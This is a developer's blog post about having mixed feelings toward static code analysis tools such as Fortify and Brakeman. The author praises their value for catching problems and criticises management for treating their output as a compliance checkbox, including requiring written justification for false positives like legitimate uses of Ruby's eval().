My Love/Hate Relationship With Static Code Analysis Tools

I have a love/hate relationship with static code analysis tools. On the one hand, they’re great at helping teams eliminate substandard code practices, especially those that may potentially result in security problems. On the other hand, they’re widely misunderstood and misused, as well, and most often often by management.

On the face of it, static code analysis tools like Fortify (a commercial tool — probably the one with the most name recognition) and Brakeman (the best tool for Ruby/Rails code) seem like an awesome idea. Rather than relying on diverse software development teams throughout the organization to properly and regularly follow best practices for coding and handling application security, let’s encode the best practices into a tool that will parse and analyze the team’s code and point out deficiencies.

Let’s parse that last sentence above a bit more closely. There are two phrases that are potentially problematic: “best practices” and “deficiencies.”

Who decides on the best practices that need to be followed? And who says that code is deficient if it doesn’t meet a best practice that the tool checks for?

The reality is that it requires judgement to assess whether a “deficiency” pointed out by a static code analysis tool is actually a problem that needs to be addressed. The only people with the technical understanding to exercise this judgement are typically the members of the development team.

It could be that the tool is overzealous in pointing out a particular type of flaw. This is true, for example, with Brakeman, which essentially attempts to stamp out any instances of metaprogramming. Brakeman flags every instance of dynamic code generation using eval( ).

Using eval( ) is not evil. It’s part of the Ruby language for a reason. It is potentially problematic if the code being executed by eval( ) is derived from user input, since a nefarious user could try to compromise the system. But determining whether the use of eval actually is a problem requires judgement, which in turn requires an understanding of the technical context of the code.

As a developer, I want to write the best code possible. I love static code analysis tools because they help me identify potential problems in my code. I’m capable of exercising the judgement to determine what does, and does not, need to be changed.

However, that determination is often not in my hands, and that’s when I start hating this type of tool. You see, management loves static code analysis tools.

Fundamentally, management doesn’t understand what software developers are doing, which is uncomfortable for management. Ultimately, management is responsible for what software development teams create, but typically doesn’t have a deep understanding of the end result.

Accordingly, management clutches on to static code analysis tools like a drowning man will latch onto a life preserver. It’s a way for them to verify that good software is being produced. It’s like the ultimate checkbox for them.

This is how using Fortify becomes an mandated best practice for government projects. Even for Ruby products, and even when the Fortify module for analyzing Ruby code is just simply awful.

Even worse, once the use of static code analysis tools become mandated, then other rules get added on. “You must submit a copy of your Fortify results with each software release.” And my favorite, “You must provide a detailed, written justification for each deficiency that is not corrected.”

This is where I start to hate static code analysis tools. Because now I have to waste valuable time to write a justification for a non-technical person who generally really doesn’t understand the issues on why I didn’t fix a “deficiency” in the code. Management often doesn’t understand that “false positives” happen or that dynamic coding (in the case of Ruby) is useful.

This is why I have a love/hate relationship with tools like Fortify and Brakeman. I love them because they help me, and my teams, to write better, more secure code. But I hate being bludgeoned by their results when the capacity to properly evaluate their output is taken away by management.

Leave a Reply

Your email address will not be published. Required fields are marked *